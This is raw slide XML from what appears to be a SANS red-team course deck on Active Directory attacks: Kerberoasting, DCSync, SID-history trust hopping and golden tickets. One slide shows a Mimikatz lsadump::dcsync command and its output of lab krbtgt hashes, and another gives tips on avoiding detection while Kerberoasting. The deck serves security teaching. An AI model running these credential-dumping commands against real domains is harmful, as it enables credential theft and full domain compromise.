              <a:rPr lang="nl-BE" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Validity time of the ticket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="214313" indent="-214313" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Session key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="214313" indent="-214313" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Picture 2" descr="Simple gold key by milovanderlinden">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F6F4B32-3D71-A3ED-C453-6207E54B2C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flipV="1">
            <a:off x="910403" y="3448335"/>
            <a:ext cx="563479" cy="28174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Simple gold key by milovanderlinden">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2353E772-A34C-9E83-D10A-46AF5BDC30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flipV="1">
            <a:off x="4417975" y="3419182"/>
            <a:ext cx="563479" cy="28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00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973B3-818A-8374-1434-3D787B1D8C6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F2EFE19-CFCD-657E-0701-8AF7E439BA04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>© 2025 SANS Institute | All Rights Reserved</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9351485-6299-3E2E-C6A4-6DFCC0905DA9}"/>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mn-cs"/>
              </a:rPr>
              <a:t>Kerberoasting</a:t>
            </a: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 and </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="5400" b="1"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mn-cs"/>
              </a:rPr>
              <a:t>DCSyncing</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42E898AB-B4C0-709C-141D-1C248011B8A7}"/>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607221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914C-4A41-39A1-945A-4FB9FEAAE450}"/>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7BDF1819-AB69-8BE1-83DB-B93CDB31C71D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625" y="1233488"/>
            <a:ext cx="5667375" cy="5472111"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The server portion of a TGS is encrypted with the service's password, long-term (LT) key in a Kerberos supported encryption format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Any authenticated user can request service tickets (even if they are not allowed to use that service)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No interaction with service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TGS can be brute forced</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{489BFB38-8587-54FB-0843-4DF8F808B180}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6312228" y="1386722"/>
            <a:ext cx="5451146" cy="3572547"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="139632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E8F8-44EE-B960-8870-4F48AF25B754}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kerberoasting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Tips and Tricks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C41CD6D0-C366-2B7C-6935-2F473A9AA0EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Important to remember:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Invoking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kerberoasting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> functionality without additional parameters will result in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kerberoasting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> all susceptible accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Over roasting can trigger alerts ranging from RC4 requests to triggering honeypots/honey services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Be very picky about which accounts you wish to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kerberoast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in a red team operation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="253302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98C9-FEFF-648A-9A93-54E378753B60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DCSync</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC2A67DD-C23C-3965-3144-3C417F96E0DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft Directory Replication Service Remote Protocol (MS-DRSR) is the protocol used by domain controllers to replicate changes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Very important protocol to remain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>in sync</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Replicating Directory Changes All</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> right</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Usually granted to domain admins and domain controllers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="174410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D5DE4B-61D6-27F5-E3CD-1DF502C78DF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can perform the MS-DRSR RPC call and retrieve the user hashes stored on the domain controller using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lsadump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dcsync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>functionality.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABB38B12-ECF9-A907-C0E9-8D356DAD26D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DCSync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEB1E53B-F31D-6950-D258-417B82530538}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428624" y="2438676"/>
            <a:ext cx="11334750" cy="3990699"/>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C:\&gt; </a:t>
            </a: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Mimikatz.exe</a:t>
            </a:r>
            <a:b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b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Mimikatz # </a:t>
            </a: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lsadump::dcsync /domain:asgard.corp /user: ASGARD\krbtgt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SAM Username : krbtgt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Object Security ID : S-1-5-21-2716382980-2373322634-4127565559-502</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Credentials:</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Hash NTLM: d6a9e8d303d88aa310f95f14feac90b1</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ntlm- 0: d6a9e8d303d88aa310f95f14feac90b1</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lm - 0: ac092f5be282a6f104f0c5c0ecac51bd</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Credentials</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aes256_hmac (4096) : dd002d202266f9c5aa9beb5eaba6518dc57212b2a3e6ff7c2fbf3ded21259da1</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aes128_hmac (4096) : ab5bc15c43d6055f90d6ce52f3de1400</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des_cbc_md5 (4096) : 23762f45836b5219</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="214128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144AB-E6E7-96C1-AA5D-6851C8400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11C85-5C19-8E0B-F6A1-9AB293D2B0DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666426" y="1382646"/>
            <a:ext cx="11525574" cy="2892857"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kerberoasting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Lateral Movement and DCSYNC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D2D8ECD-A990-ADFE-9018-C79E30432EC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lab 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1045030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952F-0C6E-1310-924E-1F0FA7D7E676}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hopping the Trust</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E3F48CE-774D-0FD7-307F-A02E50C420F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After domain compromise, we can attempt to compromise other adjacent domains. We will cover:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Child to parent hop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Tree root "generic" hop </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>(could potentially also be used in child parent hop)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="92331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F1E3-44C2-1C65-4279-3A0D19C26543}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666426" y="2213642"/>
            <a:ext cx="11525574" cy="2061861"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Environment Prep and Spinning up</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60199C45-9C1B-A721-3C21-D2876E91D86A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lab 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4007167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1E9C-72FF-8702-2E31-24BD75EE3711}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hopping the Trust: Parent/Child</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8260E2C1-170F-64C9-3795-6585C346EB6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hop from a child to a parent DC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SID history</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Facilitate the migration of users from one domain to another</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User attempts to access a resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check current SID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check SID history</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58FD8F15-D5D2-0CA8-25AC-E25FC5ECCADB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7757842" y="2747689"/>
            <a:ext cx="3815042" cy="3815042"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2435925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F8FA-D5E0-4F85-F129-C1A62A843955}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adding Some History in Our Tickets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A83EABD3-861D-8AA8-0201-115AB9C4B5A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We have already identified that once we compromise the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>We can forge our own TGTs and have full control over the PAC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>We have full control over the SID history as well!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>We can add optional SIDs to our user account and get those rights in the parent domain, too </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This attack only works within a parent-child trust.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="219687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1A76-9E91-7AA5-0A5E-167B1F0A80A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Golden Ticket</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
